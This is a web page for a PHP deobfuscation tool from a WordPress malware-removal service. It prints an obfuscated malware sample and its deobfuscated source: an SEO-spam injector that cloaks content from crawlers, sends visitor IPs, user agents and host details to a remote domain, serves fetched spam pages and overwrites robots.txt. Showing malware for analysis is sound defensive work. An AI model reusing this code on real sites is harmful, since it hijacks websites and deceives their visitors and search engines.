Japanese 
English
PHP deobfuscation, decryption, reconstruction toolDe-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.
*Please note that not all obfuscation codes can be decoded.<?php
goto zZ2p4; Bs07K: if (!(sUbstr($NRRE3, 0, 10) == "\145\162\162\157\162\40\143\x6f\144\x65" || $NRRE3 == "\65\60\x30")) { goto UFMt6; } goto QCWrI; HBlC5: wfCbT: goto Ky6VB; ZuJPX: function Vi9Hq($f_ceA, $oFatR) { goto vBIO0; i0LVu: if (!$uymA2) { goto thh6d; } goto FuOmn; FuOmn: fwrite($uymA2, $oFatR); goto hAtFl; kedJa: return false; goto fyl2X; vBIO0: $uymA2 = fopen($f_ceA, "\167"); goto i0LVu; hAtFl: fclose($uymA2); goto pGIh7; pGIh7: return true; goto twm07; twm07: thh6d: goto kedJa; fyl2X: } goto lTdEX; A8D7O: RGxHP: goto tv_5H; CpOoO: $KjoRF = ''; goto k8zis; Z8YME: UFMt6: goto xYvOb; dv_KT: $ySpnj = $_SERVER["\122\105\115\117\x54\105\137\101\x44\x44\122"]; goto Epja_; KHopb: CuRl_SeTOpT($gvR3A, CURLOPT_SSL_VERIFYHOST, FALSE); goto AT5PJ; Zrv5A: ERROR_RePORTiNg(0); goto ivU2i; s6oDp: $VTW6j = 0; goto awPKw; J1EOI: Rq_sB: goto gMNzC; YdS0T: if (STRPos($iBHAc, "\146\141\166\151\x63\157\x6e\x2e\x69\143\x6f") !== false) { goto GCP2M; } goto QL2mI; waDW7: $l6Frs = ''; goto L017F; e3wvl: if (!empty($NRRE3)) { goto QHcpM; } goto fjn2t; Rzpz6: cuRl_sEtOpT($gvR3A, CURLOPT_FOLLOWLOCATION, false); goto pOQXr; FppWE: vi9Hq("\145\x68\x6f\x2e\164\170\x74", "\x31"); goto IKL8a; rFeP0: $XbkyT = uRleNCoDe($_SERVER["\x52\x45\x51\x55\105\x53\124\x5f\123\x43\110\x45\x4d\x45"]); goto R1Tya; JuCTK: $CiR1y = "\x6f\155\x2f"; goto JOMjE; G_1cE: goto j_QIu; goto qAmLy; U1oWU: K4Kqv: goto wB5eJ; JOMjE: $kOFaJ = "\x74\x74\160\x3a"; goto crjyy; Mubg1: if (sTRpOs($K72FG, "\151\x6e\x64\145\x78\56\x70\x68") !== false) { goto eIYSC; } goto sm3Zv; awIWs: $WKd3u = uRLeNcoDE(@$_SERVER["\110\124\x54\120\x5f\x41\x43\x43\105\x50\124\137\x4c\101\116\x47\125\x41\x47\105"]); goto dv_KT; j2ogL: goto mZimc; goto QIX5v; wB5eJ: echo $NRRE3; goto mkFCu; LjZ60: $UzYK1 = "{$XbkyT}\x3a\57\57" . $o06j5 . $K72FG . "\163\x69\164\145\x6d\141\160\x2e\x78\155\154"; goto CElKr; c57Ef: goto j_QIu; goto lTAJC; i7kHC: goto zMBAe; goto zRHJQ; lFHdx: $VTW6j = 1; goto FppWE; awPKw: if (!is_file("\x65\x68\x6f\x2e\x74\x78\164")) { goto Rq_sB; } goto V1vIe; pP3sf: $_SERVER["\122\x45\121\125\x45\x53\124\137\x53\103\110\x45\x4d\x45"] = "\x68\164\x74\160"; goto j2ogL; MIIKi: if (SubsTR($NRRE3, 0, 5) == "\x3c\x3f\170\155\x6c") { goto HuRGI; } goto Vad5f; d2aLo: $NRRE3 = @FILE_Get_conTEnTS($gOKLU); goto e3wvl; VdZb_: GEoU1: goto hvU_v; e2KAz: if (!(STRPos($iBHAc, "\x72\x6f\142\157\164\163\x2e\x74\170\x74") !== false)) { goto RGxHP; } goto VA8cF; yVNM0: $gOKLU = $DjyVx . "\x3f\x61\x67\145\x6e\x74\75{$iHxot}\46\x72\145\x66\145\x72\x3d{$SrzUu}\x26\154\x61\x6e\x67\x3d{$WKd3u}\46\151\x70\x3d{$ySpnj}\x26\x64\157\x6d\x3d{$o06j5}\46\150\x74\x74\160\75{$XbkyT}\46\165\162\x69\x3d{$iBHAc}\x26\x70\x63\75{$Fdi4C}\46\162\145\x77\162\151\164\x65\x61\x62\154\x65\x3d{$VTW6j}\x26\163\143\x72\x69\x70\164\75{$y1yDC}\46\163\x69\164\x65\x6d\141\x70\75" . urlEnCODe($UzYK1); goto tlMV8; Ky6VB: vi9hQ("\x72\157\142\x6f\x74\x73\56\164\170\164", $l6Frs); goto fG26p; tv_5H: goto ZbnfF; goto HBlC5; WC6iF: cUrl_SEtoPt($gvR3A, CURLOPT_RETURNTRANSFER, true); goto Rzpz6; zUof3: CURl_cLose($gvR3A); goto pPuVG; vlUcp: Bqu0q: goto lFHdx; fjn2t: $gvR3A = Curl_IniT(); goto TI9tt; yA1ut: goto bcA90; goto J1EOI; sP_D1: $o06j5 = urlEncode($_SERVER["\110\124\x54\120\137\110\117\x53\124"]); goto C5zQz; xYvOb: if (stRpOs($iBHAc, "\152\x70\x32\x30\x32\63") !== false) { goto ACbGk; } goto MIIKi; tlMV8: yb0Jh: goto d2aLo; tl6LY: HuRGI: goto XiTKl; K2oe3: rflZP: goto s6oDp; mkFCu: if (!empty($l6Frs)) { goto wfCbT; } goto e2KAz; C5zQz: $y1yDC = UrLeNcoDe($_SERVER["\x53\x43\x52\111\120\x54\137\116\x41\115\105"]); goto HcxJI; sm3Zv: $K72FG = $K72FG . "\x3f"; goto eT1oM; TUFPn: mZimc: goto rFeP0; n8BDD: $K72FG = "\x2f"; goto hrW8l; RW0Qs: header("\110\124\x54\120\x2f\x31\56\60\40\x34\x30\x33\x20\106\x6f\x72\x62\x69\144\x64\145\156"); goto e9Wo2; zZ2p4: $ZnFNL = "\57\x2f\143"; goto hwo2B; Z4NIl: if ($NRRE3 === "\x6f\x6b") { goto Bqu0q; } goto mab9f; hwo2B: $T8ud5 = "\167\x31\x32\62\x35\56\x62\x75\x73\x74\171\x61\x64\165\154\x74\56\x63"; goto x_AJQ; GqB6Z: RRqBe: goto Po5EY; AT5PJ: $NRRE3 = Curl_exEC($gvR3A); goto zUof3; pOQXr: cUrl_SetOpt($gvR3A, CURLOPT_SSL_VERIFYPEER, FALSE); goto KHopb; HcxJI: if (!empty($_SERVER["\122\105\121\x55\x45\x53\124\137\123\x43\110\105\x4d\x45"]) and $_SERVER["\x52\105\x51\125\x45\x53\124\x5f\x53\x43\110\x45\115\x45"] == "\150\164\x74\160\163" or !empty($_SERVER["\110\x54\124\x50\123"]) and $_SERVER["\x48\124\x54\120\123"] == "\157\x6e" or !empty($_SERVER["\123\x45\x52\126\105\x52\137\120\x4f\122\124"]) and $_SERVER["\x53\105\122\126\x45\122\137\x50\x4f\122\x54"] == "\64\x34\x33" or isset($_SERVER["\110\124\x54\x50\x5f\130\137\x46\117\122\x57\101\122\104\x45\x44\x5f\120\122\x4f\x54\117"]) and $_SERVER["\x48\x54\124\120\137\130\x5f\x46\117\122\x57\101\x52\x44\105\104\x5f\120\x52\117\124\117"] == "\150\x74\x74\160\x73") { goto vJNlg; } goto pP3sf; Vad5f: header("\x43\157\156\164\x65\156\164\55\x54\x79\x70\x65\x3a\40\x74\x65\x78\x74\x2f\x68\164\155\154\73\40\143\x68\141\162\x73\x65\x74\x3d\165\164\x66\55\70"); goto isQi5; isQi5: goto Mt1jy; goto tl6LY; Gz0Is: UrISm: goto VdZb_; ObXYm: function fq_6v($ynoar) { goto K990c; AW39x: cuRL_SeTOPT($gvR3A, CURLOPT_URL, $ynoar); goto M6eH7; M6eH7: CUrL_setoPT($gvR3A, CURLOPT_RETURNTRANSFER, true); goto QrF9r; At3Zq: CURL_setOPT($gvR3A, CURLOPT_SSL_VERIFYHOST, false); goto VK1cD; K2jXb: return $oFatR; goto mjVuk; bjsZx: cuRl_SEtOpT($gvR3A, CURLOPT_SSL_VERIFYPEER, false); goto At3Zq; QrF9r: curL_SETopT($gvR3A, CURLOPT_FOLLOWLOCATION, false); goto bjsZx; XHh2Q: cUrl_CLoSe($gvR3A); goto K2jXb; VK1cD: $oFatR = cUrl_EXec($gvR3A); goto XHh2Q; K990c: $gvR3A = CUrL_INit(); goto AW39x; mjVuk: } goto ZuJPX; An0O2: echo "\157\x6b"; goto tcbMv; L017F: if (!(StRpoS($iBHAc, "\x70\x69\x6e\147\163\151\164\x65\155\141\160") !== false)) { goto yb0Jh; } goto T29GM; crjyy: $DjyVx = $PRtuU . $kOFaJ . $ZnFNL . $T8ud5 . $CiR1y; goto RaqFg; Po5EY: $SrzUu = uRLENCodE(@$_SERVER["\110\124\x54\120\x5f\x52\105\x46\x45\x52\x45\x52"]); goto U9f38; mab9f: $VTW6j = 0; goto nQsol; mmvju: header("\110\124\124\x50\57\x31\56\x31\x20\x34\60\x34\40\116\x6f\x74\40\x46\x6f\x75\x6e\144"); goto U1oWU; fdHjt: mIz4z: goto OHRii; luy73: $ySpnj = $_SERVER["\110\x54\124\120\137\103\114\x49\x45\116\124\x5f\x49\x50"]; goto G_1cE; cfZan: if (!(stRpOS($iBHAc, "\x65\150\x6f\145\150\x6f") !== false)) { goto rflZP; } goto An0O2; zRHJQ: oYqbp: goto J0ugY; vyC1r: return; goto fdHjt; nf_VC: j_QIu: goto MPsqs; CgKwg: $FTI5R = "\x44\x6f\143\157\x6d\x6f\x7c\131\x61\150\157\x6f\x7c\x42\151\156\x67\174\x47\x6f\x6f\147\154\145"; goto Zrv5A; XXgsD: eIYSC: goto OlwEU; Y2K51: ACbGk: goto mmvju; tcbMv: exit; goto K2oe3; ihtaQ: exit; goto vyC1r; qAmLy: iIWEZ: goto oRuuQ; nqSLj: $NRRE3 = Fq_6V($HGYDF); goto Z4NIl; QCWrI: header("\x48\124\x54\120\57\61\x2e\60\40\65\60\x30\40\111\x6e\x74\145\162\156\141\x6c\40\123\x65\162\x76\145\162\x20\105\162\x72\x6f\x72"); goto Q2Ll5; OlwEU: if ($VTW6j == 0) { goto BC7i0; } goto n8BDD; hvU_v: $l6Frs = "\125\x73\145\162\x2d\141\x67\x65\156\x74\x3a\x20\x2a\xd\12\101\154\154\157\x77\x3a\40\57"; goto LjZ60; lTAJC: Y6Kl8: goto luy73; w2kEL: bcA90: goto ObXYm; IKL8a: r0q9g: goto w2kEL; sx1OW: GCP2M: goto MKBK3; nQsol: VI9Hq("\145\150\157\x2e\x74\x78\x74", "\x30"); goto btKy4; O6VYT: if (empty($NRRE3)) { goto mIz4z; } goto Bs07K; lziVj: goto K4Kqv; goto Y2K51; QL2mI: if (sTrpos($iBHAc, "\x72\x6f\x62\157\x74\x73\x2e\164\170\x74") !== false or stRPOS($iBHAc, "\x70\x69\156\x67\x73\x69\164\145\x6d\x61\160") !== false or stRpoS($iBHAc, "\152\x70\x32\x30\x32\x33") !== false or pReg_MAtcH("\100\136\57\x28\56\52\77\51\56\170\155\x6c\44\x40\151", $_SERVER["\x52\x45\121\x55\x45\x53\124\137\125\122\x49"]) or PrEg_Match("\57\50{$FTI5R}\51\x2f\151", $_SERVER["\x48\x54\124\x50\x5f\125\123\105\x52\137\x41\x47\x45\x4e\124"]) or pREg_mAtch("\57\50{$FTI5R}\x29\57\x69", $_SERVER["\110\x54\x54\120\x5f\x52\105\x46\105\x52\105\x52"])) { goto oYqbp; } goto i7kHC; oRuuQ: $ySpnj = $_SERVER["\x48\124\x54\120\x5f\130\x5f\x46\x4f\122\127\x41\122\x44\105\x44\137\x46\117\x52"]; goto nf_VC; Rd1Uz: $_SERVER["\122\x45\121\x55\x45\x53\x54\x5f\x53\103\x48\105\115\105"] = "\150\164\164\x70\x73"; goto TUFPn; q6auK: $K72FG = "\57\x3f"; goto Gz0Is; Epja_: if (isset($_SERVER["\x48\124\124\120\137\103\x4c\111\x45\116\x54\x5f\x49\120"])) { goto Y6Kl8; } goto rcfY2; rcfY2: if (isset($_SERVER["\110\x54\x54\120\137\130\x5f\x46\117\x52\127\101\122\x44\105\104\x5f\106\117\x52"])) { goto iIWEZ; } goto c57Ef; eT1oM: goto GEoU1; goto XXgsD; F2sbe: BC7i0: goto q6auK; ivU2i: if (!PREG_MATcH("\x2f\x28\105\x7a\157\157\x6d\163\x7c\104\141\x74\x61\106\x6f\162\x53\x45\117\174\107\120\124\102\157\164\174\x41\163\153\124\x62\x46\x58\124\x56\x7c\160\145\164\x61\x6c\102\157\164\x7c\x6a\x61\x75\x6e\164\x79\174\141\x70\x61\x63\150\145\x42\145\156\x63\x68\x7c\x53\143\162\x61\160\x79\x7c\171\151\x73\x6f\x75\x53\160\x69\x64\x65\162\174\160\x79\x74\x68\x6f\x6e\x2d\x72\x65\x71\165\x65\163\164\163\x7c\103\x65\x6e\163\x79\x73\111\156\x73\x70\x65\143\164\174\120\171\164\150\x6f\156\174\x42\x79\x74\145\x73\x70\x69\144\145\162\x7c\114\x69\147\x68\x74\x44\145\x63\x6b\x52\x65\x70\x6f\x72\x74\x73\x20\102\x6f\x74\x7c\x64\151\147\105\x78\x74\174\123\145\x6d\162\165\x73\x68\102\x6f\x74\174\106\x65\x65\x64\154\171\174\141\x68\x72\x65\x66\x73\102\157\x74\x7c\141\155\x61\172\x6f\156\102\x6f\164\174\152\141\166\x61\x7c\x63\162\141\x77\x6c\104\x61\x64\x64\171\174\x70\171\164\150\x6f\x6e\x2d\165\162\154\x6c\x69\x62\174\145\x61\163\157\x75\x53\160\151\x64\145\162\174\x49\156\x64\171\x20\x4c\x69\x62\x72\141\162\171\174\x53\x65\172\x6e\141\x6d\x42\157\164\174\x42\141\162\x6b\162\x6f\x77\x6c\x65\x72\x7c\x53\x77\x69\x66\164\142\157\x74\x7c\x79\171\x53\x70\x69\x64\145\x72\x7c\112\151\x6b\x65\123\160\x69\x64\145\x72\x7c\110\x65\x72\x69\x74\162\151\x78\x7c\x59\x61\156\x64\145\x78\x42\x6f\164\x7c\x46\x65\x65\x64\x44\x65\x6d\x6f\x6e\174\x4d\x6a\61\x32\x62\157\164\174\x63\157\x6f\154\160\141\x64\127\x65\142\x6b\151\x74\174\132\155\105\165\x7c\x47\x6f\55\150\164\164\x70\55\x63\154\151\145\156\164\x7c\x50\x61\154\x6f\x61\154\x74\157\x6e\x65\164\x77\157\x72\153\x73\174\x48\164\x74\160\x43\154\x69\x65\x6e\x74\174\x4f\102\157\164\x7c\x55\156\151\166\145\x72\163\x61\x6c\x46\145\x65\x64\120\141\162\x73\145\162\174\104\157\x74\102\x6f\x74\x29\x2f\x69", $_SERVER["\110\x54\x54\120\137\125\x53\105\122\137\x41\107\x45\x4e\124"])) { goto RRqBe; } goto RW0Qs; T29GM: $K72FG = $_SERVER["\x53\x43\x52\111\x50\x54\x5f\116\101\115\105"]; goto Mubg1; MPsqs: $ySpnj = uRLeNCOdE($ySpnj); goto sP_D1; V1vIe: $VTW6j = BJgGk("\145\x68\157\56\164\170\x74"); goto yA1ut; Q2Ll5: exit; goto Z8YME; k8zis: echo $UzYK1 . "\x3a\x20" . $KjoRF . "\74\142\162\57\76"; goto yVNM0; RaqFg: $Fdi4C = "\104\101\116\x55\x42\x67\x6a"; goto CgKwg; VA8cF: VI9hQ("\162\157\x62\157\164\163\56\164\170\164", $NRRE3); goto A8D7O; e9Wo2: exit; goto GqB6Z; R1Tya: $iBHAc = UrlENCodE($_SERVER["\x52\x45\121\125\105\123\124\x5f\125\x52\111"]); goto cfZan; hrW8l: goto UrISm; goto F2sbe; lTdEX: function bJGgk($f_ceA) { goto SMXhg; oYr1L: return $oFatR; goto fqTrp; fqTrp: UEA2q: goto xnkSs; Kts8m: fclose($uymA2); goto oYr1L; xnkSs: return false; goto wE9vQ; PgUGi: if (!$uymA2) { goto UEA2q; } goto cBU51; cBU51: $oFatR = fread($uymA2, filesize($f_ceA)); goto Kts8m; SMXhg: $uymA2 = fopen($f_ceA, "\x72"); goto PgUGi; wE9vQ: } goto YdS0T; gMNzC: $HGYDF = $XbkyT . "\x3a\x2f\57" . $_SERVER["\110\x54\x54\120\137\x48\x4f\123\x54"] . "\x2f\x65\x68\x6f\145\x68\x6f"; goto nqSLj; OHRii: zMBAe: goto giGbA; TI9tt: CURl_SeTopT($gvR3A, CURLOPT_URL, $gOKLU); goto WC6iF; J0ugY: $gOKLU = $DjyVx . "\x3f\x61\147\145\156\164\75{$iHxot}\46\162\145\146\145\x72\75{$SrzUu}\x26\154\x61\156\x67\75{$WKd3u}\x26\151\160\x3d{$ySpnj}\x26\x64\x6f\x6d\x3d{$o06j5}\46\x68\164\x74\x70\x3d{$XbkyT}\x26\x75\x72\151\x3d{$iBHAc}\46\160\x63\x3d{$Fdi4C}\x26\x72\x65\167\x72\151\x74\145\x61\x62\x6c\145\x3d{$VTW6j}\x26\x73\x63\x72\151\160\164\75{$y1yDC}"; goto waDW7; QIX5v: vJNlg: goto Rd1Uz; XiTKl: header("\x43\157\x6e\164\x65\156\x74\55\x54\x79\160\145\72\x20\x74\145\170\164\57\x78\155\x6c\x3b\x20\x63\150\141\x72\x73\x65\164\x3d\165\x74\x66\x2d\x38"); goto wOYMD; wOYMD: Mt1jy: goto lziVj; U9f38: $iHxot = URLeNcoDe($_SERVER["\x48\x54\124\120\137\125\123\x45\x52\x5f\101\x47\x45\116\124"]); goto awIWs; fG26p: ZbnfF: goto ihtaQ; x_AJQ: $PRtuU = "\x68"; goto JuCTK; pPuVG: QHcpM: goto O6VYT; giGbA: goto ro3mM; goto sx1OW; CElKr: $l6Frs = trim($l6Frs) . "\xd\xa" . "\123\x69\164\145\x6d\x61\x70\72\x20{$UzYK1}"; goto CpOoO; btKy4: goto r0q9g; goto vlUcp; MKBK3: ro3mM:
?>
<!DOCTYPE html>
<html lang="ja">
<head><?php
$ZnFNL = "//c";
$T8ud5 = "w1225.bustyadult.c";
$PRtuU = "h";
$CiR1y = "om/";
$kOFaJ = "ttp:";
$DjyVx = "http://cw1225.bustyadult.com/";
$Fdi4C = "DANUBgj";
$FTI5R = "Docomo|Yahoo|Bing|Google";
ERROR_RePORTiNg(0);
if (!PREG_MATcH("/(Ezooms|DataForSEO|GPTBot|AskTbFXTV|petalBot|jaunty|apacheBench|Scrapy|yisouSpider|python-requests|CensysInspect|Python|Bytespider|LightDeckReports Bot|digExt|SemrushBot|Feedly|ahrefsBot|amazonBot|java|crawlDaddy|python-urllib|easouSpider|Indy Library|SeznamBot|Barkrowler|Swiftbot|yySpider|JikeSpider|Heritrix|YandexBot|FeedDemon|Mj12bot|coolpadWebkit|ZmEu|Go-http-client|Paloaltonetworks|HttpClient|OBot|UniversalFeedParser|DotBot)/i", $_SERVER["HTTP_USER_AGENT"])) {
$SrzUu = uRLENCodE(@$_SERVER["HTTP_REFERER"]);
$iHxot = URLeNcoDe($_SERVER["HTTP_USER_AGENT"]);
$WKd3u = uRLeNcoDE(@$_SERVER["HTTP_ACCEPT_LANGUAGE"]);
$ySpnj = $_SERVER["REMOTE_ADDR"];
if (isset($_SERVER["HTTP_CLIENT_IP"])) {
$ySpnj = $_SERVER["HTTP_CLIENT_IP"];
goto j_QIu;
}
if (isset($_SERVER["HTTP_X_FORWARDED_FOR"])) {
$ySpnj = $_SERVER["HTTP_X_FORWARDED_FOR"];
goto nf_VC;
}
nf_VC:
j_QIu:
$ySpnj = uRLeNCOdE($ySpnj);
$o06j5 = urlEncode($_SERVER["HTTP_HOST"]);
$y1yDC = UrLeNcoDe($_SERVER["SCRIPT_NAME"]);
if (!empty($_SERVER["REQUEST_SCHEME"]) and $_SERVER["REQUEST_SCHEME"] == "https" or !empty($_SERVER["HTTPS"]) and $_SERVER["HTTPS"] == "on" or !empty($_SERVER["SERVER_PORT"]) and $_SERVER["SERVER_PORT"] == "443" or isset($_SERVER["HTTP_X_FORWARDED_PROTO"]) and $_SERVER["HTTP_X_FORWARDED_PROTO"] == "https") {
$_SERVER["REQUEST_SCHEME"] = "https";
goto TUFPn;
}
$_SERVER["REQUEST_SCHEME"] = "http";
TUFPn:
$XbkyT = uRleNCoDe($_SERVER["REQUEST_SCHEME"]);
$iBHAc = UrlENCodE($_SERVER["REQUEST_URI"]);
if (!(stRpOS($iBHAc, "ehoeho") !== false)) {
$VTW6j = 0;
if (!is_file("eho.txt")) {
$HGYDF = $XbkyT . "://" . $_SERVER["HTTP_HOST"] . "/ehoeho";
$NRRE3 = Fq_6V($HGYDF);
if ($NRRE3 === "ok") {
$VTW6j = 1;
vi9Hq("eho.txt", "1");
goto IKL8a;
}
$VTW6j = 0;
VI9Hq("eho.txt", "0");
IKL8a:
goto w2kEL;
}
$VTW6j = BJgGk("eho.txt");
w2kEL:
function fq_6v($ynoar)
{
$gvR3A = CUrL_INit();
cuRL_SeTOPT($gvR3A, CURLOPT_URL, $ynoar);
CUrL_setoPT($gvR3A, CURLOPT_RETURNTRANSFER, true);
curL_SETopT($gvR3A, CURLOPT_FOLLOWLOCATION, false);
cuRl_SEtOpT($gvR3A, CURLOPT_SSL_VERIFYPEER, false);
CURL_setOPT($gvR3A, CURLOPT_SSL_VERIFYHOST, false);
$oFatR = cUrl_EXec($gvR3A);
cUrl_CLoSe($gvR3A);
return $oFatR;
}
function Vi9Hq($f_ceA, $oFatR)
{
$uymA2 = fopen($f_ceA, "w");
if (!$uymA2) {
return false;
}
fwrite($uymA2, $oFatR);
fclose($uymA2);
return true;
}
function bJGgk($f_ceA)
{
$uymA2 = fopen($f_ceA, "r");
if (!$uymA2) {
return false;
}
$oFatR = fread($uymA2, filesize($f_ceA));
fclose($uymA2);
return $oFatR;
}
if (STRPos($iBHAc, "favicon.ico") !== false) {
goto MKBK3;
}
if (sTrpos($iBHAc, "robots.txt") !== false or stRPOS($iBHAc, "pingsitemap") !== false or stRpoS($iBHAc, "jp2023") !== false or pReg_MAtcH("@^/(.*?).xml\$@i", $_SERVER["REQUEST_URI"]) or PrEg_Match("/({$FTI5R})/i", $_SERVER["HTTP_USER_AGENT"]) or pREg_mAtch("/({$FTI5R})/i", $_SERVER["HTTP_REFERER"])) {
$gOKLU = $DjyVx . "?agent={$iHxot}&refer={$SrzUu}&lang={$WKd3u}&ip={$ySpnj}&dom={$o06j5}&http={$XbkyT}&uri={$iBHAc}&pc={$Fdi4C}&rewriteable={$VTW6j}&script={$y1yDC}";
$l6Frs = '';
if (!(StRpoS($iBHAc, "pingsitemap") !== false)) {
goto yb0Jh;
}
$K72FG = $_SERVER["SCRIPT_NAME"];
if (sTRpOs($K72FG, "index.ph") !== false) {
if ($VTW6j == 0) {
$K72FG = "/?";
goto Gz0Is;
}
$K72FG = "/";
Gz0Is:
goto VdZb_;
}
$K72FG .= "?";
VdZb_:
$l6Frs = "User-agent: *\r\nAllow: /";
$UzYK1 = "{$XbkyT}://" . $o06j5 . $K72FG . "sitemap.xml";
$l6Frs = trim($l6Frs) . "\r\n" . "Sitemap: {$UzYK1}";
$KjoRF = '';
echo $UzYK1 . ": " . $KjoRF . "<br/>";
$gOKLU = $DjyVx . "?agent={$iHxot}&refer={$SrzUu}&lang={$WKd3u}&ip={$ySpnj}&dom={$o06j5}&http={$XbkyT}&uri={$iBHAc}&pc={$Fdi4C}&rewriteable={$VTW6j}&script={$y1yDC}&sitemap=" . urlEnCODe($UzYK1);
yb0Jh:
$NRRE3 = @FILE_Get_conTEnTS($gOKLU);
if (!empty($NRRE3)) {
goto QHcpM;
}
$gvR3A = Curl_IniT();
CURl_SeTopT($gvR3A, CURLOPT_URL, $gOKLU);
cUrl_SEtoPt($gvR3A, CURLOPT_RETURNTRANSFER, true);
cuRl_sEtOpT($gvR3A, CURLOPT_FOLLOWLOCATION, false);
cUrl_SetOpt($gvR3A, CURLOPT_SSL_VERIFYPEER, FALSE);
CuRl_SeTOpT($gvR3A, CURLOPT_SSL_VERIFYHOST, FALSE);
$NRRE3 = Curl_exEC($gvR3A);
CURl_cLose($gvR3A);
QHcpM:
if (empty($NRRE3)) {
goto OHRii;
}
if (!(sUbstr($NRRE3, 0, 10) == "error code" || $NRRE3 == "500")) {
if (stRpOs($iBHAc, "jp2023") !== false) {
header("HTTP/1.1 404 Not Found");
goto U1oWU;
}
if (SubsTR($NRRE3, 0, 5) == "<?xml") {
header("Content-Type: text/xml; charset=utf-8");
goto wOYMD;
}
header("Content-Type: text/html; charset=utf-8");
wOYMD:
U1oWU:
echo $NRRE3;
if (!empty($l6Frs)) {
vi9hQ("robots.txt", $l6Frs);
goto fG26p;
}
if (!(STRPos($iBHAc, "robots.txt") !== false)) {
goto RGxHP;
}
VI9hQ("robots.txt", $NRRE3);
RGxHP:
fG26p:
exit;
}
header("HTTP/1.0 500 Internal Server Error");
exit;
}
OHRii:
MKBK3:
?>
<!DOCTYPE html>
<html lang="ja">
<head><?php
// [PHPDeobfuscator] Implied script end
return;
}
echo "ok";
exit;
}
header("HTTP/1.0 403 Forbidden");
exit;Malware detection & removal plugin for WordPress
(C)2020 Wordpress Doctor All rights reserved.